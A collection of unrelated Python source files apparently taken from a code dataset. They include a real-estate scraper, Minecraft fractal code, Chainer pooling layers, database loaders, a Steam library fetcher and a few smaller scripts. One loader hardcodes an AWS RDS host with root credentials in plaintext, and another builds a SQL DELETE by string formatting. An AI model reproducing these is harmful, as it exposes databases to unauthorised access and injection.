\n\n\n# Loop through the list; for each page of the list, open each item's detail page, scrape it, then return to the list\ndef scrap_current_page():\n    item_list = browser.find_elements_by_xpath(\"//*[@class='address-detail']\")\n    tmp = pd.DataFrame(columns = [\"sell_price\",\n                                  \"rent_price\",\n                                  \"net_area\",\n                                  \"gross_area\",\n                                  \"effi_ratio\",\n                                  \"layout\",\n                                  \"orit\",\n                                  \"view\",\n                                  \"desc\",\n                                  \"upd_dt\",\n                                  \"addr\",\n                                  \"blk_num\",\n                                  \"school\",\n                                  \"ttl_flt\",\n                                  \"occu_permit_dt\",\n                                  \"facilities\",\n                                  \"prop_val\",\n                                  \"ln_amt\",\n                                  \"int_rt\",\n                                  \"rpy_prd\",\n                                  \"inc_reqr\"])\n    \n    for item in item_list:\n        item.click() # Open the item page\n        browser.switch_to.window(browser.window_handles[-1]) # Switch to that item tab\n        try:\n            info = scrap_item_page() # Scrape the item information\n        except: # Some item pages are broken; close them and switch back\n            browser.close()\n            browser.switch_to.window(browser.window_handles[0])\n            continue\n        tmp = tmp.append(pd.DataFrame(info, index=[0]))\n        browser.close() # Close the item tab\n        browser.switch_to.window(browser.window_handles[0]) # Switch back to the item list tab\n    return tmp\n\n\n\n# Init the dataset format\nmidland_reality_data = pd.DataFrame(columns = [\"sell_price\",\n                                  \"rent_price\",\n                                  \"net_area\",\n                                  \"gross_area\",\n                                  \"effi_ratio\",\n                                  \"layout\",\n                                  \"orit\",\n                                  \"view\",\n                                  \"desc\",\n                                  \"upd_dt\",\n                                  \"addr\",\n                                  \"blk_num\",\n                                  \"school\",\n                                  \"ttl_flt\",\n                                  \"occu_permit_dt\",\n                                  \"facilities\",\n                                  \"prop_val\",\n                                  \"ln_amt\",\n                                  \"int_rt\",\n                                  \"rpy_prd\",\n                                  \"inc_reqr\"])\n\n\n\n\n# Loop through all the pages and collect all information\ni=1\nwhile i>0: # Keep looping till break\n    print(\"Scraping page\", i, \"......\")\n    cur_pg_df = scrap_current_page()\n    midland_reality_data = midland_reality_data.append(cur_pg_df)\n    try:\n        midland_reality_data.to_csv(\"midland_realty_data.csv\", encoding = \"utf-8\")\n        print(\"Updated csv file successfully!\")\n    except:\n        print(\"oops!! Error occurred while appending page\", i)\n    \n    i+=1\n    try:\n        next_page_button = browser.find_element_by_xpath(\"//*[@id='page-selection']/ul/li[@data-lp='\"+str(i)+\"']/a\")\n        next_page_button.click()\n        time.sleep(5)\n    except:\n        print(\"No next page available, Done Scraping!\")\n        break\n\n","sub_path":"MidLand_Data_Collection.py","file_name":"MidLand_Data_Collection.py","file_ext":"py","file_size_in_byte":8929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"566343676","text":"from mcpi.minecraft import Minecraft\nimport numpy as np\nfrom random import randint\n\nx0 = 1000\nz0 = 1900\n\n# This is poor form: It treats a as a minecraft position and b as a tuple of 3 coordinates\ndef FracJump(a, b, frac): return (a.x + frac*(b[0]-a.x), a.y + frac*(b[1]-a.y), a.z + frac*(b[2]-a.z))\n\n# Chaos game in 3D is len(v) vertices and frac jumps; we will do nHops of these\n# mc is minecraft; notice the root position is determined by the player; it is not passed\n# v is a list of triples, vertex relative coordinates in (x, y, z)\n# notice there are n = len(v) such vertices, implicit\n# suppose we are at location p and select vertex q to move towards\n# frac is the distance we move along pq: and this might be more than 1 or negative\n# nHops is the number of hops we will take\n# block and blockQ specify the artifact at p\ndef ChaosGame3D(mc, v, frac, nHops, block, blockQ): \n    n, a = len(v), mc.player.getPos()\n    a.x, a.y, a.z = a.x + 20, 20, a.z + 20 # an origin offset from the player\n    p = mc.player.getPos() \n    verts = [] # vertex locations as triples\n    for i in range(n):\n        (p.x, p.y, p.z)= (v[i][0] + a.x, v[i][1] + a.y, v[i][2] + a.z)\n        verts.append((p.x, p.y, p.z))\n    for i in range(nHops):\n        p.x, p.y, p.z = FracJump(p, verts[randint(0, n-1)], frac)\n        # mc.setBlock(p.x, p.y, p.z, randint(1,60), 0)\n        mc.setBlock(p.x, p.y, p.z, block)\n\nmc = Minecraft.create()\nmc.player.setPos(x0, 100, z0) # Put the player at this location\n\nv = []\n# for i in range(n): v.append((randint(0,511),randint(0,255),randint(0,511)))\nv.append((0, 0, 0))\nv.append((180, 0, 300))\nv.append((-180, 0, 300))\nv.append((0, 255, 180))\n\nChaosGame3D(mc, v, frac = 0.5, nHops = 5000, block = 41, blockQ = 
0)\n","sub_path":"minecraft/Resources/ChaosGame.py","file_name":"ChaosGame.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"580335419","text":"import mysql.connector\nimport pandas as pd\n\nconnection = mysql.connector.connect(\n    host=\"seng2021.csbfa4eylzxn.us-east-2.rds.amazonaws.com\",\n    database=\"StockPrediction\",\n    user=\"root\",\n    password=\"SEFall2021\",\n)\n\n\ndef main():\n    loadStockDataFromCSV()\n\n\ndef loadStockDataFromCSV():\n    StockData = pd.read_csv(\"stocks.csv\")\n    StockData.columns = [\"stock_id\", \"stock_name\"]\n    if connection.is_connected():\n        cursor = connection.cursor()\n        cursor.execute(\"DROP TABLE IF EXISTS stock;\")\n        cursor.execute(\n            \"CREATE TABLE stock(stock_id nvarchar(50), stock_name nvarchar(50))\"\n        )\n        for row in StockData.index:\n            sql = \"INSERT INTO stock(stock_id,stock_name)VALUES(%s,%s);\"\n            cursor.execute(\n                sql,\n                (\n                    str(StockData.loc[row, \"stock_id\"]),\n                    str(StockData.loc[row, \"stock_name\"]),\n                ),\n            )\n        connection.commit()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"flaskr/loadstocks.py","file_name":"loadstocks.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"491041788","text":"import psycopg2\nfrom credentials import cr_dbname, cr_host, cr_password, cr_user\n\ndef insert_action1(action, newId, modified, action_counter):\n    \"\"\" Delete this estimation's previous rows from the forest.action table \"\"\"\n    delete_action_query = \"\"\"DELETE FROM forest.action WHERE standestimation_id = {}\"\"\".format(newId)\n    \"\"\" Insert a row into the forest.action table \"\"\"\n    action_query = \"\"\"INSERT INTO forest.action (\n        actiontype_id,\n        intensity,\n        standestimation_id,\n        priority,\n        modified,\n        plan_fact,\n        actionurgency_id,\n        unit_id,\n        quantity,\n        f_type\n        )\n    VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n    action_data= (\n        action['action_type']['code'],\n        action['action_intensity']['code'],\n        newId,\n        1,\n        modified,\n        0,\n        action['action_urgency']['code'],\n        1,\n        action['action_area']['value'], \n        'f25'\n        )\n    print(action_data)\n    conn = None\n    try:\n        conn = psycopg2.connect(\n            dbname=cr_dbname, user=cr_user, password=cr_password, host=cr_host)\n        cur = conn.cursor()\n        if action_counter == 0:\n            cur.execute(delete_action_query)\n        cur.execute(action_query, (action_data))\n        print('action')\n        conn.commit()\n        cur.close()\n    except (Exception, psycopg2.DatabaseError) as error:\n        print(error)\n    finally:\n        if conn is not None:\n            conn.close()\n","sub_path":"stand_estimation_oopt/insertAction1.py","file_name":"insertAction1.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"179658362","text":"import collections\n\nimport numpy\n\nfrom chainer import cuda\nfrom chainer import cudnn\nfrom chainer import function\nfrom chainer.utils import conv\nfrom chainer.utils import type_check\n\nif cudnn.available:\n    from chainer.cudnn import libcudnn\n\n\ndef _pair(x):\n    if isinstance(x, collections.Iterable):\n        return x\n    return (x, x)\n\n\nclass Pooling2D(function.Function):\n\n    \"\"\"Base class of pooling function over a set of 2d planes.\"\"\"\n\n    def __init__(self, ksize, stride=None, pad=0, cover_all=True,\n                 use_cudnn=True):\n        if stride is None:\n            stride = ksize\n\n        self.kh, self.kw = _pair(ksize)\n        self.sy, self.sx = _pair(stride)\n        self.ph, self.pw = _pair(pad)\n\n 
self.cover_all = cover_all\n self.use_cudnn = use_cudnn\n\n def check_type_forward(self, in_types):\n type_check.expect(\n in_types.size() == 1,\n in_types[0].dtype == numpy.float32,\n in_types[0].ndim == 4\n )\n\n def forward_gpu(self, x):\n # Implementation using cudnn\n n, c, h, w = x[0].shape\n y_h = conv.get_conv_outsize(\n h, self.kh, self.sy, self.ph, self.cover_all)\n y_w = conv.get_conv_outsize(\n w, self.kw, self.sx, self.pw, self.cover_all)\n y = cuda.empty((n, c, y_h, y_w), dtype=numpy.float32)\n\n handle = cudnn.get_default_handle()\n pool_desc = self.create_pool_desc()\n x_desc = cudnn.get_tensor_desc(x[0], x[0].shape[2], x[0].shape[3])\n y_desc = cudnn.get_tensor_desc(y, y_h, y_w)\n\n libcudnn.cudnnPoolingForward(\n handle, pool_desc.value, 1, x_desc.value, cudnn.get_ptr(x[0]),\n 0, y_desc.value, cudnn.get_ptr(y))\n self.y = y\n\n return y,\n\n def backward_gpu(self, x, gy):\n # Implementation using cudnn\n handle = cudnn.get_default_handle()\n pool_desc = self.create_pool_desc()\n\n x_desc = cudnn.get_tensor_desc(x[0], x[0].shape[2], x[0].shape[3])\n y_desc = cudnn.get_tensor_desc(gy[0], gy[0].shape[2], gy[0].shape[3])\n\n gx = cuda.empty_like(x[0])\n libcudnn.cudnnPoolingBackward(\n handle, pool_desc.value, 1, y_desc.value, cudnn.get_ptr(self.y),\n y_desc.value, cudnn.get_ptr(\n gy[0]), x_desc.value, cudnn.get_ptr(x[0]),\n 0, x_desc.value, cudnn.get_ptr(gx))\n return gx,\n\n def create_pool_desc(self):\n raise NotImplementedError()\n\n\nclass MaxPooling2D(Pooling2D):\n\n \"\"\"Max pooling over a set of 2d planes.\"\"\"\n\n def forward_cpu(self, x):\n col = conv.im2col_cpu(\n x[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,\n pval=-float('inf'), cover_all=self.cover_all)\n n, c, kh, kw, out_h, out_w = col.shape\n col = col.reshape(n, c, kh * kw, out_h, out_w)\n\n # We select maximum twice, since the implementation using numpy.choose\n # hits its bug when kh * kw >= 32.\n self.indexes = col.argmax(axis=2)\n y = col.max(axis=2)\n return y,\n\n def forward_gpu(self, x):\n if cudnn.enabled and self.use_cudnn:\n return super(MaxPooling2D, self).forward_gpu(x)\n\n n, c, h, w = x[0].shape\n y_h = conv.get_conv_outsize(\n h, self.kh, self.sy, self.ph, self.cover_all)\n y_w = conv.get_conv_outsize(\n w, self.kw, self.sx, self.pw, self.cover_all)\n y = cuda.empty((n, c, y_h, y_w), dtype=numpy.float32)\n self.indexes = cuda.empty((n, c, y_h, y_w), dtype=numpy.int32)\n\n cuda.elementwise(\n '''\n float* out, int* indexes, const float* in,\n int h, int w, int out_h, int out_w,\n int kh, int kw, int sy, int sx, int ph, int pw\n ''', '''\n int c0 = i / (out_h * out_w);\n int out_y = i / out_w % out_h;\n int out_x = i % out_w;\n int in_y_0 = max(0, out_y * sy - ph);\n int in_y_1 = min(h, out_y * sy + kh - ph);\n int in_x_0 = max(0, out_x * sx - pw);\n int in_x_1 = min(w, out_x * sx + kw - pw);\n\n float maxval = in[in_x_0 + w * (in_y_0 + h * c0)];\n int argmax_y = in_y_0;\n int argmax_x = in_x_0;\n for (int y = in_y_0; y < in_y_1; ++y) {\n int offset_y = w * (y + h * c0);\n for (int x = in_x_0; x < in_x_1; ++x) {\n float v = in[x + offset_y];\n if (maxval < v) {\n maxval = v;\n argmax_y = y;\n argmax_x = x;\n }\n }\n }\n out[i] = maxval;\n\n int argmax_ky = argmax_y + ph - out_y * sy;\n int argmax_kx = argmax_x + pw - out_x * sx;\n indexes[i] = argmax_kx + kw * argmax_ky;\n ''', 'max_pool_fwd')(y, self.indexes, x[0], h, w, y_h, y_w,\n self.kh, self.kw, self.sy, self.sx, self.ph,\n self.pw)\n return y,\n\n def backward_cpu(self, x, gy):\n n, c, out_h, out_w = gy[0].shape\n h, w = 
x[0].shape[2:]\n        gcol = numpy.zeros(\n            (n, c, self.kh, self.kw, out_h, out_w), dtype=numpy.float32)\n\n        # TODO(beam2d): Make it fast\n        gcol_r = numpy.rollaxis(gcol.reshape(n, c, -1, out_h, out_w), 2)\n        for i in numpy.ndindex(n, c, out_h, out_w):\n            gcol_r[self.indexes[i]][i] = gy[0][i]\n\n        gx = conv.col2im_cpu(gcol, self.sy, self.sx, self.ph, self.pw, h, w)\n        return gx,\n\n    def backward_gpu(self, x, gy):\n        if cudnn.enabled and self.use_cudnn:\n            return super(MaxPooling2D, self).backward_gpu(x, gy)\n\n        n, c, h, w = x[0].shape\n        y_h, y_w = gy[0].shape[2:]\n        gx = cuda.empty_like(x[0])\n\n        cuda.elementwise(\n            '''\n               float* gx, const int* indexes, const float* gy,\n               int h, int w, int out_h, int out_w,\n               int kh, int kw, int sy, int sx, int ph, int pw\n            ''', '''\n               int c0 = i / (h * w);\n               int y = i / w % h + ph;\n               int x = i % w + pw;\n               int out_y_0 = max(0, (y - kh + sy) / sy);\n               int out_y_1 = min(out_h, (y + sy) / sy);\n               int out_x_0 = max(0, (x - kw + sx) / sx);\n               int out_x_1 = min(out_w, (x + sx) / sx);\n\n               float val = 0;\n               for (int out_y = out_y_0; out_y < out_y_1; ++out_y) {\n                 int ky = y - out_y * sy;\n                 for (int out_x = out_x_0; out_x < out_x_1; ++out_x) {\n                   int kx = x - out_x * sx;\n                   int offset = out_x + out_w * (out_y + out_h * c0);\n                   if (indexes[offset] == kx + kw * ky) {\n                     val += gy[offset];\n                   }\n                 }\n               }\n               gx[i] = val;\n            ''',\n            'max_pool_bwd')(gx, self.indexes, gy[0], h, w, y_h, y_w, self.kh,\n                            self.kw, self.sy, self.sx, self.ph, self.pw)\n        return gx,\n\n    def create_pool_desc(self):\n        return cudnn.get_pool2d_desc(\n            (self.kh, self.kw), (self.sy, self.sx), (self.ph, self.pw),\n            'CUDNN_POOLING_MAX')\n\n\ndef max_pooling_2d(x, ksize, stride=None, pad=0, cover_all=True,\n                   use_cudnn=True):\n    \"\"\"Spatial max pooling function.\n\n    This function acts similarly to :class:`~functions.Convolution2D`, but\n    it computes the maximum of input spatial patch for each channel\n    without any parameter instead of computing the inner products.\n\n    Args:\n        x (~chainer.Variable): Input variable.\n        ksize (int or (int, int)): Size of pooling window. ``ksize=k`` and\n            ``ksize=(k, k)`` are equivalent.\n        stride (int or (int, int) or None): Stride of pooling applications.\n            ``stride=s`` and ``stride=(s, s)`` are equivalent. If None is\n            specified, then it uses same stride as the pooling window size.\n        pad (int or (int, int)): Spatial padding width for the input array.\n            ``pad=p`` and ``pad=(p, p)`` are equivalent.\n        cover_all (bool): If True, all spatial locations are pooled into some\n            output pixels. It may make the output size larger.\n        use_cudnn (bool): If True and CuDNN is enabled, then this function\n            uses CuDNN as the core implementation.\n\n    Returns:\n        ~chainer.Variable: Output variable.\n\n    \"\"\"\n    return MaxPooling2D(ksize, stride, pad, cover_all, use_cudnn)(x)\n
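\n# usage sketch (editor's addition; assumes `x` is a chainer Variable wrapping an\n# (N, C, H, W) float32 array):\n#   y = max_pooling_2d(x, ksize=2, stride=2)  # halves the spatial dimensions\n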
\n\nclass AveragePooling2D(Pooling2D):\n\n    \"\"\"Average pooling over a set of 2d planes.\"\"\"\n    # TODO(beam2d): Support cover_all mode.\n\n    def forward_cpu(self, x):\n        col = conv.im2col_cpu(x[0], self.kh, self.kw, self.sy, self.sx,\n                              self.ph, self.pw)\n        y = col.mean(axis=(2, 3))\n        return y,\n\n    def forward_gpu(self, x):\n        if cudnn.enabled and self.use_cudnn:\n            return super(AveragePooling2D, self).forward_gpu(x)\n\n        n, c, h, w = x[0].shape\n        y_h = conv.get_conv_outsize(h, self.kh, self.sy, self.ph)\n        y_w = conv.get_conv_outsize(w, self.kw, self.sx, self.pw)\n        y = cuda.empty((n, c, y_h, y_w), dtype=numpy.float32)\n        coeff = 1. / (self.kh * self.kw)\n\n        cuda.elementwise(\n            '''\n               float* out, const float* in, int h, int w, int out_h, int out_w,\n               int kh, int kw, int sy, int sx, int ph, int pw, float coeff\n            ''', '''\n               int c0 = i / (out_h * out_w);\n               int out_y = i / out_w % out_h;\n               int out_x = i % out_w;\n               int in_y_0 = max(0, out_y * sy - ph);\n               int in_y_1 = min(h, out_y * sy + kh - ph);\n               int in_x_0 = max(0, out_x * sx - pw);\n               int in_x_1 = min(w, out_x * sx + kw - pw);\n\n               float val = 0;\n               for (int y = in_y_0; y < in_y_1; ++y) {\n                 int offset_y = w * (y + h * c0);\n                 for (int x = in_x_0; x < in_x_1; ++x) {\n                   val += in[x + offset_y];\n                 }\n               }\n               out[i] = val * coeff;\n            ''', 'avg_pool_fwd')(y, x[0], h, w, y_h, y_w, self.kh, self.kw,\n                                 self.sy, self.sx, self.ph, self.pw, coeff)\n        return y,\n\n    def backward_cpu(self, x, gy):\n        h, w = x[0].shape[2:]\n        gcol = numpy.tile(gy[0][:, :, numpy.newaxis, numpy.newaxis],\n                          (1, 1, self.kh, self.kw, 1, 1))\n        gx = conv.col2im_cpu(gcol, self.sy, self.sx, self.ph, self.pw, h, w)\n        gx /= self.kh * self.kw\n        return gx,\n\n    def backward_gpu(self, x, gy):\n        if cudnn.enabled and self.use_cudnn:\n            return super(AveragePooling2D, self).backward_gpu(x, gy)\n\n        n, c, h, w = x[0].shape\n        y_h, y_w = gy[0].shape[2:]\n        gx = cuda.empty_like(x[0])\n        coeff = 1. / (self.kh * self.kw)\n\n        cuda.elementwise(\n            '''\n               float* gx, const float* gy, int h, int w, int out_h, int out_w,\n               int kh, int kw, int sy, int sx, int ph, int pw, float coeff\n            ''', '''\n               int c0 = i / (h * w);\n               int y = i / w % h + ph;\n               int x = i % w + pw;\n               int out_y_0 = max(0, (y - kh + sy) / sy);\n               int out_y_1 = min(out_h, (y + sy) / sy);\n               int out_x_0 = max(0, (x - kw + sx) / sx);\n               int out_x_1 = min(out_w, (x + sx) / sx);\n               int hc0 = out_h * c0;\n\n               float val = 0;\n               for (int out_y = out_y_0; out_y < out_y_1; ++out_y) {\n                 for (int out_x = out_x_0; out_x < out_x_1; ++out_x) {\n                   val += gy[out_x + out_w * (out_y + hc0)];\n                 }\n               }\n               gx[i] = val * coeff;\n            ''', 'avg_pool_bwd')(gx, gy[0], h, w, y_h, y_w, self.kh, self.kw,\n                                 self.sy, self.sx, self.ph, self.pw, coeff)\n        return gx,\n\n    def create_pool_desc(self):\n        return cudnn.get_pool2d_desc(\n            (self.kh, self.kw), (self.sy, self.sx), (self.ph, self.pw),\n            'CUDNN_POOLING_AVERAGE_COUNT_INCLUDE_PADDING')\n\n\ndef average_pooling_2d(x, ksize, stride=None, pad=0, use_cudnn=True):\n    \"\"\"Spatial average pooling function.\n\n    This function acts similarly to :class:`~functions.Convolution2D`, but\n    it computes the average of input spatial patch for each channel\n    without any parameter instead of computing the inner products.\n\n    Args:\n        x (~chainer.Variable): Input variable.\n        ksize (int or (int, int)): Size of pooling window. ``ksize=k`` and\n            ``ksize=(k, k)`` are equivalent.\n        stride (int or (int, int) or None): Stride of pooling applications.\n            ``stride=s`` and ``stride=(s, s)`` are equivalent. If None is\n            specified, then it uses same stride as the pooling window size.\n        pad (int or (int, int)): Spatial padding width for the input array.\n            ``pad=p`` and ``pad=(p, p)`` are equivalent.\n        use_cudnn (bool): If True and CuDNN is enabled, then this function\n            uses CuDNN as the core implementation.\n\n    Returns:\n        ~chainer.Variable: Output variable.\n\n    .. note::\n\n       This function currently does not support ``cover_all`` mode as\n       :func:`max_pooling_2d` does. Average pooling runs in non-cover-all mode.\n\n    \"\"\"\n    return AveragePooling2D(ksize, stride, pad, False, use_cudnn)(x)\n
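\n# usage sketch (editor's addition): the averaging counterpart of the call above,\n#   y = average_pooling_2d(x, ksize=2, stride=2)\n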
","sub_path":"chainer/functions/pooling_2d.py","file_name":"pooling_2d.py","file_ext":"py","file_size_in_byte":13605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"167462783","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.9-x86_64/egg/firestore/datatypes/map.py\n# Compiled at: 2019-08-25 22:19:11\n# Size of source mod 2**32: 2603 bytes\nfrom firestore.containers.collection import Collection\nfrom firestore.datatypes.base import Base\nfrom firestore.errors import ValidationError\n\nclass MapSchema(Collection):\n    __doc__ = '\\n    A map schema defines a helper by which maps can be populated\\n    so there is no need to use default python dicts'\n\n    def __init__(self, *args, **kwargs):\n        self.py_type = dict\n        (super(MapSchema, self).__init__)(*args, **kwargs)\n\n\nclass Map(Base):\n    __doc__ = 'Maps as defined by firestore represent an object saved within a document.\\n    In python speak - A map is akin to a dictionary.\\n\\n    Maps on Firestore cloud are an ordered collection of key value pairs\\n    and the firestore library mimics this sorting at retrieval and traversal\\n    which is sufficient for almost all use cases encountered in the wild\\n    '\n\n    def __init__(self, *args, **kwargs):\n        try:\n            self.map_ref = args[0]\n        except IndexError:\n            self.map_ref = None\n\n        (super(Map, self).__init__)(*args, **kwargs)\n\n    def __set__(self, instance, value):\n        self.validate(value)\n        if self.map_ref:\n            value = (self.map_ref)(**value) if isinstance(value, dict) else value\n        self.value = value\n        instance.add_field(self, value)\n        instance.__mutated__ = True\n\n    def validate(self, value, instance=None):\n        if self.map_ref:\n            if not isinstance(value, (MapSchema, dict)):\n                raise ValueError()\n            if isinstance(value, dict):\n                _schema = self.map_ref.__autospector__()\n                for k in _schema:\n                    f = _schema.get(k)\n                    v = value.get(k)\n                    f.validate(v)\n\n        else:\n            value._presave()","sub_path":"pycfiles/firestore-0.0.8-py3.7/map.cpython-37.py","file_name":"map.cpython-37.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"313483771","text":"\nimport math\n\ndef guardarNumero (numeroSeisCifras):\n    if (numeroSeisCifras<100000 or numeroSeisCifras>999999):\n        print (\"Invalid ticket\")\n        quit()\n    if (numeroSeisCifras>=100000 and numeroSeisCifras<1000000): \n        cienMiles=math.trunc(numeroSeisCifras/100000)\n        diezMiles=math.trunc((numeroSeisCifras-(cienMiles*100000))/10000)\n        miles=math.trunc((numeroSeisCifras-((cienMiles*100000)+(diezMiles*10000)))/1000)\n        cientos=math.trunc((numeroSeisCifras-((cienMiles*100000)+(diezMiles*10000)+(miles*1000)))/100)\n        decenas=math.trunc((numeroSeisCifras-((cienMiles*100000)+(diezMiles*10000)+(miles*1000)+(cientos*100)))/10)\n        unidades=math.trunc((numeroSeisCifras-((cienMiles*100000)+(diezMiles*10000)+(miles*1000)+(cientos*100)+(decenas*10))))\n        horario=(miles+cientos)\n
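        # worked example (editor's addition): for 358214 the digits come out as\n        # cienMiles=3, diezMiles=5, miles=8, cientos=2, decenas=1, unidades=4,\n        # so horario = miles + cientos = 10.\n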
        if ((unidades+cienMiles)>5):\n            print (\"your ticket is valid\")\n            if (diezMiles>0 and diezMiles<7):\n                print (\", the entry type is pitch-side (grass) seating\") \n            if (diezMiles==0 or (diezMiles>6 and diezMiles<=9)):\n                print (\", the entry type is general\") \n            # the odd values 1..17 were previously spelled out one by one\n            if (horario % 2 == 1):\n                print (\", you must enter through gate 2 starting at 8pm\")\n            # likewise the even values 0..18; horario is always in 0..18 here\n            else:\n                print (\", you must enter through gate 1 starting at 7pm\") \n    \n\n\n\n\n\n\n\n#--------------------------------------------\n#main\n\nnumeroSeisCifras = int(input(\"Enter a six-digit number.\"))\n\nguardarNumero (numeroSeisCifras)\n","sub_path":"programa3.py","file_name":"programa3.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"28400542","text":"import os, logging\n\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\nfrom components import Device, Link, create\nfrom topology import Topology\nfrom mint.utils import each\n\nlog = logging.getLogger('scene')\n\nclass Scene(QGraphicsScene):\n\n    def __init__(self, models):\n        super(Scene, self).__init__()\n        self.setSceneRect(-4000, -4000, 8000, 8000)\n        self.populate(models)\n\n    def populate(self, models):\n        self.devices = []\n        self.links = []\n        self.items = []\n        tip2device = {}\n        for model in models:\n            item = create(model)\n            if item:\n                log.debug('adding {}'.format(model))\n                self.items.append(item)\n                if isinstance(item, Device):\n                    log.debug('update {}\'s tips'.format(model))\n                    tip2device.update({tip: item for tip in model.tips})\n                    self.devices.append(item)\n                elif isinstance(item, Link):\n                    item.setZValue(-1)\n                    self.links.append(item)\n        log.debug('adding finished: {}'.format(\n            map(str, each(self.items).model)))\n        self.load_ok = True\n        for link in self.links:\n            peers = each(link.model.tips).peer\n            try:\n                link.devices = tuple(tip2device[tip] for tip in peers)\n            except KeyError:\n                log.error('{}\'s endpoint is not added to scene'.format(\n                    link.model))\n                self.ok = False\n        if self.load_ok:\n            for item in self.items:\n                self.addItem(item)\n                self.addItem(item.console)\n\n    def load(self):\n        path = QApplication.instance().resources['path']\n        self.topo_path = os.path.join(path, 'topos')\n        if self.load_ok:\n            ok = Topology(self.views()[0], self.items, self.topo_path).load()\n            self.views()[0].load_ok = ok\n\n    def save(self):\n        if self.load_ok:\n            Topology(self.views()[0], self.items, self.topo_path).save()\n\n    def update_status(self):\n        each(self.items).refresh()\n\n    def toggle(self, what):\n        each(self.items).toggle(what)\n","sub_path":"mint/_versions/20151130230204 switch port frame lost/mint/gui/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"15420702","text":"import requests, json\n\n\nclass SteamGameGrabber(object):\n\n    def __init__(self):\n\n        self.url = ''\n        self.headers = {\n            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n        self.start_tag = \"var rgGames\"\n        self.end_tag = \"var rgChangingGames\"\n\n        self.last_data = {}\n\n    def send_request(self):\n\n        try:\n            response = requests.get(self.url, headers=self.headers)\n            raw_data = str(response.content, encoding=\"utf-8\")\n        except:\n            return [False, \"Something Wrong! 
Connection Lost!\"]\n\n        else:\n            if response.status_code == 200:\n                return [True, raw_data]\n            else:\n                return [False, \"Check Your Connection ( status_code is Not 200 )!\"]\n\n    def pars_data(self, get_input):\n\n        def find_between(s, first, last):\n\n            try:\n                start = s.index(first) + len(first)\n                end = s.index(last, start)\n            except:\n                return [False, \"Parsing Error\"]\n            else:\n                return [True, s[start:end]]\n\n        if \"Steam Community :: Error\" in get_input:\n            return [False, \"I Can Not Find This ID on Steam Server\"]\n\n        # (editor's note) the marker literal below was lost during extraction;\n        # 'This profile is private' is a guess based on the message underneath.\n        if 'This profile is private' in get_input:\n            return [False, \"This profile is private, I can not Decode it, sorry.\"]\n\n        get_data = find_between(get_input, self.start_tag, self.end_tag)\n\n        if get_data[0] is True:\n\n            dict_data = json.loads(get_data[1].strip().lstrip(\"=\").rstrip(\";\").strip())\n\n            try:\n                for box in dict_data:\n\n                    game_id = str(box['appid']).strip()\n                    game_name = box['name'].strip()\n\n                    if game_name in self.last_data:\n                        pass\n\n                    else:\n\n                        self.last_data[game_name] = game_id\n            except:\n                return [False, \"Format is Wrong\"]\n\n            else:\n                return [True, self.last_data]\n\n        else:\n            return [False, get_data[1]]\n\n    def call_all(self, get_id):\n\n        if get_id.strip() == \"\":\n            return \"Please Insert Your Steam ID\"\n\n        else:\n            new_id = self.URLstrip(get_id)\n\n            if 'id' in get_id:\n                self.url = 'http://steamcommunity.com/id/{0}/games/?tab=all'.format(new_id)\n            elif 'profile' in get_id:\n                self.url = 'http://steamcommunity.com/profiles/{0}/games/?tab=all'.format(new_id)\n\n            get_state_1 = self.send_request()\n\n            if get_state_1[0] is True:\n\n                get_state_2 = self.pars_data(get_state_1[1])\n                return get_state_2[1]\n\n            else:\n                return get_state_1[1]\n\n    def URLstrip(self, url):\n        if 'id' in url:\n            part = url.find('id')\n            new_id = url[int(part)+3:len(url)]\n            return new_id\n        elif 'profile' in url:\n            part = url.find('profiles')\n            new_id = url[int(part)+9:len(url)]\n            return new_id\n\ndef getSameGames(user_list):\n    total_games = []\n    final_list = []\n    for user in user_list:\n        your_id = user\n        make_object = SteamGameGrabber()\n        get_result = make_object.call_all(your_id)\n        for names, appid in get_result.items():\n            total_games.append(names)\n    for item in total_games:\n        if total_games.count(item) >= len(user_list):\n            final_list.append(item)\n    new = set(final_list)\n    return(new)\n
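\n# usage sketch (editor's addition; the profile URLs are placeholders):\n#   getSameGames([\"http://steamcommunity.com/id/alice\",\n#                 \"http://steamcommunity.com/id/bob\"])\n# returns the set of game names owned by every listed account.\n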
","sub_path":"game_grabber.py","file_name":"game_grabber.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
